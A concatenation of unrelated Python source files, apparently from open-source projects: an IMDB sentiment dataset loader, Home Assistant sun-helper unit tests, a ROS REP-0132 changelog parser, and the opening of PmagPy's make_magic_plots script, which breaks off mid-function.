if not try in the data directory.
Download dataset if it is not present
'''
data_dir, data_file = os.path.split(dataset)
if data_dir == "" and not os.path.isfile(dataset):
# Check if dataset is in the data directory.
new_path = os.path.join(
os.path.split(__file__)[0],
"..",
"data",
dataset
)
if os.path.isfile(new_path) or data_file == default_dataset:
dataset = new_path
if (not os.path.isfile(dataset)) and data_file == default_dataset:
from six.moves import urllib
print('Downloading data from %s' % origin)
urllib.request.urlretrieve(origin, dataset)
return dataset
def load_data(path="imdb_sup.pkl", n_words=100000, valid_portion=0.1, maxlen=None,
sort_by_len=True):
'''Loads the dataset
:type path: String
:param path: The path to the dataset (here IMDB)
:type n_words: int
:param n_words: The number of word to keep in the vocabulary.
All extra words are set to unknow (1).
:type valid_portion: float
:param valid_portion: The proportion of the full train set used for
the validation set.
:type maxlen: None or positive int
:param maxlen: the max sequence length we use in the train/valid set.
:type sort_by_len: bool
:name sort_by_len: Sort by the sequence lenght for the train,
valid and test set. This allow faster execution as it cause
less padding per minibatch. Another mechanism must be used to
shuffle the train set at each epoch.
'''
#############
# LOAD DATA #
#############
# Load the dataset
path = get_dataset_file(
path, "imdb.pkl",
"http://www.iro.umontreal.ca/~lisa/deep/data/imdb.pkl")
if path.endswith(".gz"):
f = gzip.open(path, 'rb')
else:
f = open(path, 'rb')
train_set = pickle.load(f)
test_set = pickle.load(f)
f.close()
if maxlen:
new_train_set_x = []
new_train_set_y = []
for x, y in zip(train_set[0], train_set[1]):
if len(x) < maxlen:
new_train_set_x.append(x)
new_train_set_y.append(y)
train_set = (new_train_set_x, new_train_set_y)
del new_train_set_x, new_train_set_y
# split training set into validation set
train_set_x, train_set_y = train_set
n_samples = len(train_set_x)
sidx = numpy.random.permutation(n_samples)
n_train = int(numpy.round(n_samples * (1. - valid_portion)))
valid_set_x = [train_set_x[s] for s in sidx[n_train:]]
valid_set_y = [train_set_y[s] for s in sidx[n_train:]]
train_set_x = [train_set_x[s] for s in sidx[:n_train]]
train_set_y = [train_set_y[s] for s in sidx[:n_train]]
train_set = (train_set_x, train_set_y)
valid_set = (valid_set_x, valid_set_y)
def remove_unk(x):
return [[1 if w >= n_words else w for w in sen] for sen in x]
test_set_x, test_set_y = test_set
valid_set_x, valid_set_y = valid_set
train_set_x, train_set_y = train_set
train_set_x = remove_unk(train_set_x)
valid_set_x = remove_unk(valid_set_x)
test_set_x = remove_unk(test_set_x)
def len_argsort(seq):
return sorted(range(len(seq)), key=lambda x: len(seq[x]))
if sort_by_len:
sorted_index = len_argsort(test_set_x)
test_set_x = [test_set_x[i] for i in sorted_index]
test_set_y = [test_set_y[i] for i in sorted_index]
sorted_index = len_argsort(valid_set_x)
valid_set_x = [valid_set_x[i] for i in sorted_index]
valid_set_y = [valid_set_y[i] for i in sorted_index]
sorted_index = len_argsort(train_set_x)
train_set_x = [train_set_x[i] for i in sorted_index]
train_set_y = [train_set_y[i] for i in sorted_index]
train = (train_set_x, train_set_y)
valid = (valid_set_x, valid_set_y)
test = (test_set_x, test_set_y)
return train, valid, test
def load_data_unsup(path="imdb_unsup.pkl", n_words=100000, valid_portion=0.1, maxlen=None,
sort_by_len=True):
'''Loads the dataset
:type path: String
:param path: The path to the dataset (here IMDB)
:type n_words: int
:param n_words: The number of word to keep in the vocabulary.
All extra words are set to unknow (1).
:type valid_portion: float
:param valid_portion: The proportion of the full train set used for
the validation set.
:type maxlen: None or positive int
:param maxlen: the max sequence length we use in the train/valid set.
:type sort_by_len: bool
:name sort_by_len: Sort by the sequence lenght for the train,
valid and test set. This allow faster execution as it cause
less padding per minibatch. Another mechanism must be used to
shuffle the train set at each epoch.
'''
#############
# LOAD DATA #
#############
# Load the dataset
path = get_dataset_file(
path, "imdb.pkl",
"http://www.iro.umontreal.ca/~lisa/deep/data/imdb.pkl")
if path.endswith(".gz"):
f = gzip.open(path, 'rb')
else:
f = open(path, 'rb')
train_set = pickle.load(f)
f.close()
# split training set into validation set
train_set_x = train_set
n_samples = len(train_set_x)
sidx = numpy.random.permutation(n_samples)
n_train = int(numpy.round(n_samples * (1. - valid_portion)))
valid_set_x = [train_set_x[s] for s in sidx[n_train:]]
train_set_x = [train_set_x[s] for s in sidx[:n_train]]
train_set = (train_set_x)
valid_set = (valid_set_x)
def remove_unk(x):
return [[1 if w >= n_words else w for w in sen] for sen in x]
valid_set_x = valid_set
train_set_x = train_set
train_set_x = remove_unk(train_set_x)
valid_set_x = remove_unk(valid_set_x)
def len_argsort(seq):
return sorted(range(len(seq)), key=lambda x: len(seq[x]))
if sort_by_len:
sorted_index = len_argsort(valid_set_x)
valid_set_x = [valid_set_x[i] for i in sorted_index]
sorted_index = len_argsort(train_set_x)
train_set_x = [train_set_x[i] for i in sorted_index]
train_unsup = (train_set_x)
valid = (valid_set_x)
return train_unsup, valid
| |
"""The tests for the Sun helpers."""
# pylint: disable=protected-access
import unittest
from unittest.mock import patch
from datetime import timedelta, datetime
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
import homeassistant.util.dt as dt_util
import homeassistant.helpers.sun as sun
from tests.common import get_test_home_assistant
# pylint: disable=invalid-name
class TestSun(unittest.TestCase):
"""Test the sun helpers."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def test_next_events(self):
"""Test retrieving next sun events."""
utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
from astral import Astral
astral = Astral()
utc_today = utc_now.date()
latitude = self.hass.config.latitude
longitude = self.hass.config.longitude
mod = -1
while True:
next_dawn = (astral.dawn_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_dawn > utc_now:
break
mod += 1
mod = -1
while True:
next_dusk = (astral.dusk_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_dusk > utc_now:
break
mod += 1
mod = -1
while True:
next_midnight = (astral.solar_midnight_utc(
utc_today + timedelta(days=mod), longitude))
if next_midnight > utc_now:
break
mod += 1
mod = -1
while True:
next_noon = (astral.solar_noon_utc(
utc_today + timedelta(days=mod), longitude))
if next_noon > utc_now:
break
mod += 1
mod = -1
while True:
next_rising = (astral.sunrise_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_rising > utc_now:
break
mod += 1
mod = -1
while True:
next_setting = (astral.sunset_utc(
utc_today + timedelta(days=mod), latitude, longitude))
if next_setting > utc_now:
break
mod += 1
with patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=utc_now):
assert next_dawn == sun.get_astral_event_next(
self.hass, 'dawn')
assert next_dusk == sun.get_astral_event_next(
self.hass, 'dusk')
assert next_midnight == sun.get_astral_event_next(
self.hass, 'solar_midnight')
assert next_noon == sun.get_astral_event_next(
self.hass, 'solar_noon')
assert next_rising == sun.get_astral_event_next(
self.hass, SUN_EVENT_SUNRISE)
assert next_setting == sun.get_astral_event_next(
self.hass, SUN_EVENT_SUNSET)
def test_date_events(self):
"""Test retrieving next sun events."""
utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
from astral import Astral
astral = Astral()
utc_today = utc_now.date()
latitude = self.hass.config.latitude
longitude = self.hass.config.longitude
dawn = astral.dawn_utc(utc_today, latitude, longitude)
dusk = astral.dusk_utc(utc_today, latitude, longitude)
midnight = astral.solar_midnight_utc(utc_today, longitude)
noon = astral.solar_noon_utc(utc_today, longitude)
sunrise = astral.sunrise_utc(utc_today, latitude, longitude)
sunset = astral.sunset_utc(utc_today, latitude, longitude)
assert dawn == sun.get_astral_event_date(
self.hass, 'dawn', utc_today)
assert dusk == sun.get_astral_event_date(
self.hass, 'dusk', utc_today)
assert midnight == sun.get_astral_event_date(
self.hass, 'solar_midnight', utc_today)
assert noon == sun.get_astral_event_date(
self.hass, 'solar_noon', utc_today)
assert sunrise == sun.get_astral_event_date(
self.hass, SUN_EVENT_SUNRISE, utc_today)
assert sunset == sun.get_astral_event_date(
self.hass, SUN_EVENT_SUNSET, utc_today)
def test_date_events_default_date(self):
"""Test retrieving next sun events."""
utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
from astral import Astral
astral = Astral()
utc_today = utc_now.date()
latitude = self.hass.config.latitude
longitude = self.hass.config.longitude
dawn = astral.dawn_utc(utc_today, latitude, longitude)
dusk = astral.dusk_utc(utc_today, latitude, longitude)
midnight = astral.solar_midnight_utc(utc_today, longitude)
noon = astral.solar_noon_utc(utc_today, longitude)
sunrise = astral.sunrise_utc(utc_today, latitude, longitude)
sunset = astral.sunset_utc(utc_today, latitude, longitude)
with patch('homeassistant.util.dt.now', return_value=utc_now):
assert dawn == sun.get_astral_event_date(
self.hass, 'dawn', utc_today)
assert dusk == sun.get_astral_event_date(
self.hass, 'dusk', utc_today)
assert midnight == sun.get_astral_event_date(
self.hass, 'solar_midnight', utc_today)
assert noon == sun.get_astral_event_date(
self.hass, 'solar_noon', utc_today)
assert sunrise == sun.get_astral_event_date(
self.hass, SUN_EVENT_SUNRISE, utc_today)
assert sunset == sun.get_astral_event_date(
self.hass, SUN_EVENT_SUNSET, utc_today)
def test_date_events_accepts_datetime(self):
"""Test retrieving next sun events."""
utc_now = datetime(2016, 11, 1, 8, 0, 0, tzinfo=dt_util.UTC)
from astral import Astral
astral = Astral()
utc_today = utc_now.date()
latitude = self.hass.config.latitude
longitude = self.hass.config.longitude
dawn = astral.dawn_utc(utc_today, latitude, longitude)
dusk = astral.dusk_utc(utc_today, latitude, longitude)
midnight = astral.solar_midnight_utc(utc_today, longitude)
noon = astral.solar_noon_utc(utc_today, longitude)
sunrise = astral.sunrise_utc(utc_today, latitude, longitude)
sunset = astral.sunset_utc(utc_today, latitude, longitude)
assert dawn == sun.get_astral_event_date(
self.hass, 'dawn', utc_now)
assert dusk == sun.get_astral_event_date(
self.hass, 'dusk', utc_now)
assert midnight == sun.get_astral_event_date(
self.hass, 'solar_midnight', utc_now)
assert noon == sun.get_astral_event_date(
self.hass, 'solar_noon', utc_now)
assert sunrise == sun.get_astral_event_date(
self.hass, SUN_EVENT_SUNRISE, utc_now)
assert sunset == sun.get_astral_event_date(
self.hass, SUN_EVENT_SUNSET, utc_now)
def test_is_up(self):
"""Test retrieving next sun events."""
utc_now = datetime(2016, 11, 1, 12, 0, 0, tzinfo=dt_util.UTC)
with patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=utc_now):
assert not sun.is_up(self.hass)
utc_now = datetime(2016, 11, 1, 18, 0, 0, tzinfo=dt_util.UTC)
with patch('homeassistant.helpers.condition.dt_util.utcnow',
return_value=utc_now):
assert sun.is_up(self.hass)
def test_norway_in_june(self):
"""Test location in Norway where the sun doesn't set in summer."""
self.hass.config.latitude = 69.6
self.hass.config.longitude = 18.8
june = datetime(2016, 6, 1, tzinfo=dt_util.UTC)
print(sun.get_astral_event_date(self.hass, SUN_EVENT_SUNRISE,
datetime(2017, 7, 25)))
print(sun.get_astral_event_date(self.hass, SUN_EVENT_SUNSET,
datetime(2017, 7, 25)))
print(sun.get_astral_event_date(self.hass, SUN_EVENT_SUNRISE,
datetime(2017, 7, 26)))
print(sun.get_astral_event_date(self.hass, SUN_EVENT_SUNSET,
datetime(2017, 7, 26)))
assert sun.get_astral_event_next(self.hass, SUN_EVENT_SUNRISE, june) \
== datetime(2016, 7, 25, 23, 23, 39, tzinfo=dt_util.UTC)
assert sun.get_astral_event_next(self.hass, SUN_EVENT_SUNSET, june) \
== datetime(2016, 7, 26, 22, 19, 1, tzinfo=dt_util.UTC)
assert sun.get_astral_event_date(self.hass, SUN_EVENT_SUNRISE, june) \
is None
assert sun.get_astral_event_date(self.hass, SUN_EVENT_SUNSET, june) \
is None
| |
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, Open Source Robotics Foundation, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Open Source Robotics Foundation, Inc. nor
# the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
'''
Processes ROS changelogs so that they can be used in binary packaging.
The Changelog format is described in REP-0132:
http://ros.org/reps/rep-0132.html
'''
from __future__ import print_function
from __future__ import unicode_literals
import sys
_py3 = sys.version_info >= (3, 0)
import dateutil.parser
import docutils
import docutils.core
import logging
import os
import pkg_resources
import re
try:
_unicode = unicode
except NameError:
_unicode = str
__author__ = "William Woodall"
__email__ = "william@osrfoundation.org"
__maintainer__ = "William Woodall"
log = logging.getLogger('changelog')
CHANGELOG_FILENAME = 'CHANGELOG.rst'
example_rst = """\
^^^^^^^^^^^^^^^^^^^^^^^^^
Changelog for package foo
^^^^^^^^^^^^^^^^^^^^^^^^^
0.1
===
Free form text about this minor release.
0.1.27 (forthcoming)
--------------------
* Great new feature
0.1.26 (2012-12-26)
-------------------
* Utilizes caching to improve query performance (fix https://github.com/ros/ros_comm/pull/2)
* Simplified API calls based on (https://github.com/ros/robot_model):
* Note that these changes are based on REP 192
* Also they fix a problem related to initialization
* Fixed synchronization issue on startup
.. not mentioning secret feature on purpose
0.1.25 (2012-11-25)
-------------------
- Added thread safety
- Replaced custom XML parser with `TinyXML <http://www.grinninglizard.com/tinyxml/>`_.
- Fixed regression introduced in 0.1.22
- New syntax for foo::
foo('bar')
- Added a safety check for XML parsing
----
The library should now compile under ``Win32``
0.1.0 (2012-10-01)
------------------
*First* public **stable** release
0.0
===
0.0.1 (2012-01-31)
------------------
1. Initial release
2. Initial bugs
"""
def bullet_list_class_from_docutils(bullet_list, bullet_type=None):
'''
Processes elements of bullet list into an encapsulating class
:param bullet_list: ``docutils.nodes.bullet_list`` list to be processed
:param bullet_type: ``str`` either 'bullet' or 'enumerated'
:returns: ``BulletList`` object representing a docutils bullet_list
'''
content = BulletList(bullet_type=bullet_type)
for child in bullet_list.children:
if isinstance(child, docutils.nodes.list_item):
content.bullets.append(mixed_text_from_docutils(child))
else:
log.debug("Skipped bullet_list child: '{0}'".format(child))
return content
def mixed_text_from_docutils(node):
'''
Takes most Text-ish docutils objects and converts them to MixedText
:param node: ``docutils.nodes.{paragraph, list_item, ...}`` text-ish
:returns: ``MixedText`` representing the given docutils object
'''
content = MixedText()
for child in node.children:
if isinstance(child, docutils.nodes.paragraph):
content.texts.extend(mixed_text_from_docutils(child).texts)
elif isinstance(child, docutils.nodes.Text):
content.texts.append(child.astext())
elif isinstance(child, docutils.nodes.reference):
content.texts.append(reference_from_docutils(child))
elif isinstance(child, docutils.nodes.emphasis):
content.texts.append('*{0}*'.format(child.astext()))
elif isinstance(child, docutils.nodes.strong):
content.texts.append('**{0}**'.format(child.astext()))
elif isinstance(child, docutils.nodes.literal):
content.texts.append('``{0}``'.format(child.astext()))
elif isinstance(child, docutils.nodes.literal_block):
content.texts.append('\n\n ' + child.astext() + '\n')
elif isinstance(child, docutils.nodes.target):
pass
elif isinstance(child, docutils.nodes.system_message):
log.debug("Skipping system_message: {0}".format(child))
elif isinstance(child, docutils.nodes.bullet_list):
content.texts.append(bullet_list_class_from_docutils(child))
else:
try:
# Try to add it as plain text
log.debug("Trying to add {0}'s child of type {1}: '{2}'"
.format(type(node), type(child), child))
content.texts.append(child.astext())
except AttributeError:
log.debug("Ignored {0} child of type {1}: '{2}'"
.format(type(node), type(child), child))
return content
def get_changelog_from_path(path, package_name=None):
'''
Changelog factory, which reads a changelog file into a class
:param path: ``str`` the path of the changelog including or excluding the filename CHANGELOG.rst
:param package_name: ``str`` the package name
:returns: ``Changelog`` changelog class or None if file was not readable
'''
changelog = Changelog(package_name)
if os.path.isdir(path):
path = os.path.join(path, CHANGELOG_FILENAME)
try:
with open(path, 'r') as f:
populate_changelog_from_rst(changelog, f.read())
except IOError:
return None
return changelog
def populate_changelog_from_rst(changelog, rst):
'''
Changelog factory, which converts the raw ReST into a class
:param changelog: ``Changelog`` changelog to be populated
:param rst: ``str`` raw ReST changelog
:returns: ``Changelog`` changelog that was populated
'''
document = docutils.core.publish_doctree(rst)
processes_changelog_children(changelog, document.children)
changelog.rst = rst
return changelog
def processes_changelog_children(changelog, children):
'''
Processes docutils children into a REP-0132 changelog instance.
Recurse into sections, check (sub-)titles if they are valid versions.
:param changelog: ``Changelog`` changelog to be populated
:param section: ``docutils.nodes.section`` section to be processed
:returns: ``Changelog`` changelog that was populated
'''
for i, child in enumerate(children):
if isinstance(child, docutils.nodes.section):
processes_changelog_children(changelog, child.children)
elif isinstance(child, docutils.nodes.title) or isinstance(child, docutils.nodes.subtitle):
version, date = None, None
# See if the title has a text element in it
if len(child.children) > 0 and isinstance(child.children[0], docutils.nodes.Text):
# Extract version and date from (sub-)title
title_text = child.children[0].rawsource
try:
version, date = version_and_date_from_title(title_text)
except InvalidSectionTitle:
# Catch invalid section titles
log.debug("Ignored non-compliant title: '{0}'".format(title_text))
continue
valid_section = None not in (version, date)
if valid_section:
contents = []
# For each remaining sibling
for child in children[i + 1:]:
# Skip sections (nesting of valid sections not allowed)
if isinstance(child, docutils.nodes.section):
log.debug("Ignored section child: '{0}'".format(child))
continue
# Skip title
if isinstance(child, docutils.nodes.title):
continue
# Skip comments
if isinstance(child, docutils.nodes.comment):
log.debug("Ignored section child: '{0}'".format(child))
continue
# Process other elements into the contents
if isinstance(child, docutils.nodes.bullet_list):
contents.append(bullet_list_class_from_docutils(child))
elif isinstance(child, docutils.nodes.enumerated_list):
contents.append(bullet_list_class_from_docutils(child, bullet_type='enumerated'))
elif isinstance(child, docutils.nodes.transition):
contents.append(Transition())
elif isinstance(child, docutils.nodes.paragraph):
contents.append(mixed_text_from_docutils(child))
else:
log.debug("Skipped section child: '{0}'".format(child))
changelog.add_version_section(version, date, contents)
break
else:
log.debug("Ignored non-compliant title: '{0}'".format(child))
def reference_from_docutils(reference):
'''
Turns a reference element into a ``Reference``
:param reference: ``docutils.nodes.reference`` reference element
:returns: ``Reference`` simpler object representing the reference
'''
name, refuri = None, None
for pair in reference.attlist():
if pair[0] == 'name':
name = pair[1]
if pair[0] == 'refuri':
refuri = pair[1]
return Reference(name, refuri)
def version_and_date_from_title(title):
'''
Splits a section title into version and date if possible.
:param title: ``str`` raw section title to be processed
:returns: ``(str, datetime.datetime)``
:raises: ``InvalidSectionTitle`` for non REP-0132 section titles
'''
match = re.search(r'^([0-9]+\.[0-9]+\.[0-9]+)[ ]\((.+)\)$', title)
if match is None:
raise InvalidSectionTitle(title)
version, date_str = match.groups()
try:
date = dateutil.parser.parse(date_str)
except (ValueError, TypeError) as e:
# Catch invalid dates
log.debug("Error parsing date ({0}): '{1}'".format(date_str, e))
raise InvalidSectionTitle(title)
return version, date
class BulletList(object):
'''Represents a bulleted list of text'''
def __init__(self, bullets=None, bullet_type=None):
'''
:param bullets: ``list(MixedText)`` list of text bullets
:param bullet_type: ``str`` either 'bullet' or 'enumerated'
'''
bullet_type = 'bullet' if bullet_type is None else bullet_type
if bullet_type not in ['bullet', 'enumerated']:
raise RuntimeError("Invalid bullet type: '{0}'".format(bullet_type))
self.bullets = bullets or []
self.bullet_type = bullet_type
def __iter__(self):
for bullet in self.bullets:
yield bullet
def __str__(self):
value = self.__unicode__()
if not _py3:
value = value.encode('ascii', 'replace')
return value
def __unicode__(self):
return self.as_txt()
def as_rst(self):
return self.as_txt(indent='', use_hyphen_bullet=True)
def as_txt(self, indent='', use_hyphen_bullet=False):
bullet = '*' if self.bullet_type == 'bullet' else '#'
if use_hyphen_bullet and bullet == '*':
bullet = '-'
b = self.bullet_generator(bullet)
i = indent
n = '\n' + i + ' '
lines = [i + next(b) + _unicode(l).replace('\n', n) for l in self]
return '\n'.join(lines)
def bullet_generator(self, bullet):
if '#' == bullet:
bullets = [str(i) + '. ' for i in range(1, len(self.bullets) + 1)]
else:
bullets = [bullet + ' '] * len(self.bullets)
for b in bullets:
yield b
class Changelog(object):
'''
Represents a REP-0132 changelog
'''
def __init__(self, package_name=None):
self.__package_name = package_name
self.__versions = []
self.__parsed_versions = []
self.__dates = {}
self.__content = {}
self.__rst = ''
def __str__(self):
value = self.__unicode__()
if not _py3:
value = value.encode('ascii', 'replace')
return value
def __unicode__(self):
msg = []
if self.__package_name:
msg.append("Changelog for package '{0}'".format(self.package_name))
for version, date, content in self.foreach_version(reverse=True):
msg.append(' ' + version + ' ({0}):'.format(date))
for item in content:
msg.extend([' ' + i for i in _unicode(item).splitlines()])
return '\n'.join(msg)
@property
def package_name(self):
return self.__package_name
@package_name.setter
def package_name(self, package_name):
self.__package_name = package_name
@property
def rst(self):
return self.__rst
@rst.setter
def rst(self, rst):
self.__rst = rst
def add_version_section(self, version, date, contents):
'''
Adds a version section
:param version: ``str`` version as a string
:param date: ``datetime.datetime`` version date
:param contents: ``list(list([str|Reference]))``` contents as a list
of lists which contain a combination of ``str`` and
``Reference`` objects
:returns: None
'''
if version in self.__versions:
raise DuplicateVersionsException(version)
self.__parsed_versions.append(pkg_resources.parse_version(version))
self.__parsed_versions = sorted(self.__parsed_versions)
# Cannot go parsed -> str, so sorting must be done by comparison
new_versions = [None] * len(self.__parsed_versions)
for v in self.__versions + [version]:
parsed_v = pkg_resources.parse_version(v)
index = self.__parsed_versions.index(parsed_v)
if index == -1:
raise RuntimeError("Inconsistent internal version storage state")
new_versions[index] = v
self.__versions = new_versions
self.__dates[version] = date
self.__content[version] = contents
def foreach_version(self, reverse=False):
'''
Creates a generator for iterating over the versions, dates and content
Versions are stored and iterated in order.
:param reverse: ``bool`` if True then the iteration is reversed
:returns: ``generator`` for iterating over versions, dates and content
'''
for version in reversed(self.__versions) if reverse else self.__versions:
yield version, self.__dates[version], self.__content[version]
def get_date_of_version(self, version):
'''Returns date of a given version as a ``datetime.datetime``'''
if version not in self.__versions:
raise KeyError("No date for version '{0}'".format(version))
return self.__dates[version]
def get_content_of_version(self, version):
'''
Returns changelog content for a given version
:param version: ``str`` version
:returns: ``list(list([str|Reference]))`` content expanded
'''
if version not in self.__versions:
raise KeyError("No content for version '{0}'".format(version))
return self.__content[version]
class DuplicateVersionsException(Exception):
'''Raised when more than one section per version is given'''
def __init__(self, version):
self.version = version
Exception.__init__(self, "Version '{0}' is specified twice".format(version))
class InvalidSectionTitle(Exception):
'''raised on non REP-0132 section titles'''
def __init__(self, title):
self.title = title
msg = "Section title does not conform to REP-0132: '{0}'".format(title)
Exception.__init__(self, msg)
class MixedText(object):
'''Represents text mixed with references and nested bullets'''
def __init__(self, texts=[]):
self.texts = list(texts)
def __iter__(self):
for text in self.texts:
yield text
def __str__(self):
value = self.__unicode__()
if not _py3:
value = value.encode('ascii', 'replace')
return value
def __unicode__(self):
return self.to_txt()
def to_txt(self, bullet_indent=' '):
lines = []
for t in self:
if isinstance(t, BulletList):
bullets = [bullet_indent + x for x in _unicode(t).splitlines()]
bullets = ['', ''] + bullets + ['']
lines.extend('\n'.join(bullets))
else:
lines.append(_unicode(t))
return ''.join(lines)
class Reference(object):
'''
Represents a piece of text with an associated link
'''
def __init__(self, text, link):
self.text = text
self.link = link
def __str__(self):
value = self.__unicode__()
if not _py3:
value = value.encode('ascii', 'replace')
return value
def __unicode__(self):
return self.as_txt()
def as_rst(self):
'''Self as rst (unicode)'''
if self.text is None:
return _unicode(self.link)
return "`{0} <{1}>`_".format(self.text, self.link)
def as_txt(self):
'''Self formatted for plain text (unicode)'''
if self.text is None:
return _unicode(self.link)
return "{0} <{1}>".format(self.text, self.link)
class Transition(object):
'''Represents a trasition element from ReST'''
def __str__(self):
value = self.__unicode__()
if not _py3:
value = value.encode('ascii', 'replace')
return value
def __unicode__(self):
return '-' * 20
def __iter__(self):
yield self.unicode()
def __test():
package_name = 'foo'
changelog = Changelog(package_name)
print(populate_changelog_from_rst(changelog, example_rst))
if __name__ == '__main__':
logging.basicConfig()
log.setLevel(logging.DEBUG)
__test()
| |
#!/usr/bin/env python
import sys
import os
import datetime
import glob
import shutil
from pmagpy import pmag
from pmagpy import ipmag
from pmagpy import version
from pmagpy import contribution_builder as cb
from programs import thumbnails
VERBOSE = True
def error_log(msg, loc="", program="", con_id=""):
con_id = str(con_id)
with open('errors.txt', 'a') as log:
log.write(con_id + '\t' + str(datetime.datetime.now()) + '\t' + loc + '\t' + program + '\t' + msg + '\n')
full_msg = '-W- ' + con_id + '\t' + loc + '\t' + program + '\t' + msg + '\n'
if VERBOSE:
print(full_msg)
sys.stderr.write(full_msg)
def info_log(msg, loc="", program=""):
with open('log.txt', 'a') as log:
log.write(str(datetime.datetime.now()) + "\t" + loc + "\t" + program + '\t' + msg + '\n')
def check_for_reqd_cols(data, reqd_cols):
"""
Check data (PmagPy list of dicts) for required columns
"""
missing = []
for col in reqd_cols:
if col not in data[0]:
missing.append(col)
return missing
def main():
"""
NAME
make_magic_plots.py
DESCRIPTION
inspects magic directory for available data and makes plots
SYNTAX
make_magic_plots.py [command line options]
INPUT
magic files
OPTIONS
-h prints help message and quits
-f FILE specifies input file name
-fmt [png,eps,svg,jpg,pdf] specify format, default is png
"""
if '-h' in sys.argv:
print(main.__doc__)
sys.exit()
# reset log files
for fname in ['log.txt', 'errors.txt']:
f = os.path.join(os.getcwd(), fname)
if os.path.exists(f):
os.remove(f)
image_recs = []
dirlist = ['./']
dir_path = os.getcwd()
#
if '-fmt' in sys.argv:
ind = sys.argv.index("-fmt")
fmt = sys.argv[ind + 1]
else:
fmt = 'png'
do_thumbnails = False if "-no-thumb" in sys.argv else True
if '-f' in sys.argv:
ind = sys.argv.index("-f")
filelist = [sys.argv[ind + 1]]
else:
filelist = os.listdir(dir_path)
## initialize some variables
samp_file = 'samples.txt'
meas_file = 'measurements.txt'
#loc_key = 'location'
loc_file = 'locations.txt'
method_key = 'method_codes'
dec_key = 'dir_dec'
inc_key = 'dir_inc'
tilt_corr_key = "dir_tilt_correction"
aniso_tilt_corr_key = "aniso_tilt_correction"
hyst_bcr_key = "hyst_bcr"
hyst_mr_key = "hyst_mr_moment"
hyst_ms_key = "hyst_ms_moment"
hyst_bc_key = "hyst_bc"
Mkeys = ['magnitude', 'magn_moment', 'magn_volume', 'magn_mass']
results_file = 'sites.txt'
hyst_file = 'specimens.txt'
aniso_file = 'specimens.txt'
# create contribution and propagate data throughout
full_con = cb.Contribution()
full_con.propagate_location_to_measurements()
full_con.propagate_location_to_specimens()
full_con.propagate_location_to_samples()
if not full_con.tables:
print('-E- No MagIC tables could be found in this directory')
error_log("No MagIC tables found")
return
# try to get the contribution id for error logging
con_id = ""
if 'contribution' in full_con.tables:
if 'id' in full_con.tables['contribution'].df.columns:
con_id = full_con.tables['contribution'].df.iloc[0]['id']
# check to see if propagation worked, otherwise you can't plot by location
lowest_table = None
for table in full_con.ancestry:
if table in full_con.tables:
lowest_table = table
break
do_full_directory = False
# check that locations propagated down to the lowest table in the contribution
if 'location' in full_con.tables[lowest_table].df.columns:
if 'locations' not in full_con.tables:
info_log('location names propagated to {}, but could not be validated'.format(lowest_table))
# are there any locations in the lowest table?
elif not all(full_con.tables[lowest_table].df['location'].isnull()):
locs = full_con.tables['locations'].df.index.unique()
lowest_locs = full_con.tables[lowest_table].df['location'].unique()
incorrect_locs = set(lowest_locs).difference(set(locs))
# are they actual locations?
if not incorrect_locs:
info_log('location names propagated to {}'.format(lowest_table))
else:
do_full_directory = True
error_log('location names did not propagate fully to {} table (looks like there are some naming inconsistencies between tables)'.format(lowest_table), con_id=con_id)
else:
do_full_directory = True
error_log('could not propagate location names down to {} table'.format(lowest_table), con_id=con_id)
else:
do_full_directory = True
error_log('could not propagate location names down to {} table'.format(lowest_table), con_id=con_id)
all_data = {}
all_data['measurements'] = full_con.tables.get('measurements', None)
all_data['specimens'] = full_con.tables.get('specimens', None)
all_data['samples'] = full_con.tables.get('samples', None)
all_data['sites'] = full_con.tables.get('sites', None)
all_data['locations'] = full_con.tables.get('locations', None)
if 'locations' in full_con.tables:
locations = full_con.tables['locations'].df.index.unique()
else:
locations = ['']
dirlist = [loc for loc in locations if cb.not_null(loc, False) and loc != 'nan']
if not dirlist:
dirlist = ["./"]
if do_full_directory:
dirlist = ["./"]
# plot the whole contribution as one location
if dirlist == ["./"]:
error_log('plotting the entire contribution as one location', con_id=con_id)
for fname in os.listdir("."):
if fname.endswith(".txt"):
shutil.copy(fname, "tmp_" + fname)
# if possible, go through all data by location
# use tmp_*.txt files to separate out by location
for loc in dirlist:
print('\nworking on: ', loc)
def get_data(dtype, loc_name):
"""
Extract data of type dtype for location loc_name.
Write tmp_dtype.txt files if possible.
"""
if cb.not_null(all_data[dtype], False):
